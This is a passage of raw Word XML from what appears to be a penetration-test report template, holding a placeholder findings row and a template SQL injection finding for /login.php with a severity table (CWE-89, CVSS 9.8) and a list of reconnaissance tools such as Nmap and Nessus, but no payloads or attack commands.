          </w:tcPr>
          <w:p w14:paraId="3E64F565" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="42270865" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Fake Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1635" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="93C47D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E79E953" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="93C47D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="55F8FECD" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4C53DCCF" w14:textId="667FD22A" w:rsidR="00475B86" w:rsidRDefault="00A64A83">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="010B00AC" w14:textId="3928B1C4" w:rsidR="00475B86" w:rsidRPr="003C45D6" w:rsidRDefault="00922DBC" w:rsidP="003C45D6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>TEMPLATE NOTE: (Sorting by descending risk score)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4A15BE" w14:textId="4442721B" w:rsidR="004C0FFF" w:rsidRPr="003C45D6" w:rsidRDefault="004C0FFF" w:rsidP="003C45D6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="sql-injection-vulnerability-on-login.php"/>
      <w:bookmarkStart w:id="95" w:name="_Toc178498988"/>
      <w:r w:rsidRPr="003C45D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. SQL Injection Vulnerability on /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C45D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003C45D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Critical)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="7131126E" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRPr="003C45D6" w:rsidRDefault="004C0FFF" w:rsidP="003C45D6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="information-gathering-reconnaissance"/>
      <w:bookmarkStart w:id="97" w:name="_Toc178498989"/>
      <w:r w:rsidRPr="003C45D6">
        <w:t>Information Gathering (Reconnaissance)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="029D0245" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Step -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6CD1BA" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Step -2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B6C368" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Step -3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7360C5" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Step -4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6854464C" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Step -5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0419BE8F" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRPr="00A76F46" w:rsidRDefault="004C0FFF" w:rsidP="003C45D6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="vulnerability-details"/>
      <w:bookmarkStart w:id="99" w:name="_Toc178498990"/>
      <w:bookmarkEnd w:id="96"/>
      <w:r w:rsidRPr="00A76F46">
        <w:t>Vulnerability Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>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094"/>
        <w:gridCol w:w="7256"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C0FFF" w14:paraId="756C508C" w14:textId="77777777" w:rsidTr="00A76F46">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shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6AB02B78" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03808B4A" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="3E125D9B" w14:textId="77777777" w:rsidTr="00A76F46">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="575B13AD" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C0EC7C3" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Allows attackers to manipulate database queries, potentially bypassing authentication and accessing sensitive data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="40D6AFCC" w14:textId="77777777" w:rsidTr="00A76F46">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="619DCE03" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DF52699" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>login</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="6E5337F9" w14:textId="77777777" w:rsidTr="00A76F46">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0722F476" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CWE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6309140E" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>CWE-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="1039D912" w14:textId="77777777" w:rsidTr="00A76F46">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="099731F6" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>OWASP Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0864706E" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>A1 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="2ED7778E" w14:textId="77777777" w:rsidTr="00A76F46">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1649485B" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1469831C" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="3E510D0E" w14:textId="77777777" w:rsidTr="00A76F46">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1B1246C6" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2731D8A6" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="2CE009F4" w14:textId="77777777" w:rsidTr="00A76F46">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="466EA721" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E0E7D0C" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="46987167" w14:textId="77777777" w:rsidTr="00A76F46">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="29EAB241" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BC52E92" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>HighLikelihood of exploitation within the context of the organization and current trends</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="7BE06969" w14:textId="77777777" w:rsidTr="00A76F46">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="61435881" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FA72FC4" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Severe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E3D4C" w14:paraId="28A4856E" w14:textId="77777777" w:rsidTr="00A76F46">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4CE9AD7E" w14:textId="46E36771" w:rsidR="002E3D4C" w:rsidRDefault="002E3D4C" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BB1A21A" w14:textId="0E2452D0" w:rsidR="002E3D4C" w:rsidRDefault="002E3D4C" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Not Solved</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="292C6923" w14:textId="77777777" w:rsidTr="00A76F46">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6B38E10B" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Affected Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="001E659A" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Login Form</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="147BF385" w14:textId="77777777" w:rsidTr="00A76F46">
        <w:trPr>
          <w:trHeight w:val="60"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="27CA334B" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="131E825D" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Second Order</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7239DE99" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRPr="00A76F46" w:rsidRDefault="004C0FFF" w:rsidP="003C45D6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="used-tools"/>
      <w:bookmarkStart w:id="101" w:name="_Toc178498991"/>
      <w:bookmarkEnd w:id="98"/>
      <w:r w:rsidRPr="00A76F46">
        <w:t>Used tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1423"/>
        <w:gridCol w:w="2541"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C0FFF" w14:paraId="71F983BA" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="311D9702" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5736F247" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="40552DAC" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C3F7308" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Dig, WHOIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="792CA224" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>DNS Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="3292185C" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EC5FD39" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C90301A" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Port Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w14:paraId="7BEC51FA" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29BD3CC4" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Nessus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BD0FFA5" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3411D962" w14:textId="09CF9CD8" w:rsidR="004C0FFF" w:rsidRDefault="00A76F46" w:rsidP="003C45D6">
